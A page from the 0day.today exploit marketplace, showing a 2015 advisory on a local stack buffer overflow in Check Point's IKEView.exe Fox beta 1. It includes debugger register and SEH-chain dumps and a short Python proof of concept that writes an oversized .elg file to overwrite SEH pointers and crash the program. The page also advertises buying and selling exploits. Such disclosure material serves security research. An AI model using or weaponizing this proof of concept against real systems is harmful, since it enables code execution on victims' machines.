[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

IKEView.exe Fox beta 1 - Stack Buffer Overflow Vulnerability

Author
hyp3rlinx
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24247
Category
dos / poc
Date add
15-09-2015
Platform
windows
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CP_IKEVIEW-0911.txt

Vendor:
================================
www.checkpoint.com

Product:
================================
IKEView.exe Fox beta 1
 
IKEVIew.EXE is used to inspect - internet private key exchanges on the Firewall
phase(1 & 2) packets being exchanged with switches and gateways.

Vulnerability Type:
======================
Stack Buffer Overflow

Vulnerability Details:
=====================
IKEView.exe is vulnerable to local stack based buffer overflow when parsing
an malicious (internet key exchange) ".elg" file.
Vulnerability causes nSEH & SEH pointer overwrites at 4448 bytes after
IKEView parses our malicious file, which may result then
result in arbitrary attacker supplied code execution.
 
 
quick GDB register dump:
------------------------
 
EAX 00000000
ECX 41414141
EDX 7774B4AD ntdll.7774B4AD
EBX 00000000
ESP 0018E0E0
EBP 0018E100
ESI 00000000
EDI 00000000
EIP 41414141
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
 
-----------SEH Chain---------
 
0:000> !exchain
0018f870: 42424242
Invalid exception stack at 41414141
0:000>
0018f870: 42424242
Invalid exception stack at 41414141
0:000>
 
0018F868 |02004AE0 àJ. ASCII "File loaded in 08 minutes, 01 seconds."
0018F86C |41414141 AAAA
0018F870 |41414141 AAAA Pointer to next SEH record
0018F874 |42424242 BBBB SE handler
 
 
Quick Buffer Overflow POC :
===========================
 
 
1) Below python file to create POC save as .py it will generate POC file,
open in IKEView.exe and KABOOOOOOOOOOOOOOOOOOOOM!
 
seh="B"*4 #<----------will overwrite SEH with bunch of 42's HEX for 'B'
ASCII char.
 
file="C:\\IKEView-buffer-overflow.elg"
x=open(file,"w")
payload="A"*4444+seh
x.write(payload)
x.close()
 
print "\n=======================================\n"
print " IKEView-buffer-overflow.elg file created\n"
print " hyp3rlinx ..."
print "=========================================\n"


Description:
==========================================================
 
Vulnerable Product: [+] IKEView.exe Fox beta 1
Vulnerable File Type: [+] .elg
Affected Area(s): [+] Local OS

#  0day.today [2024-11-16]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team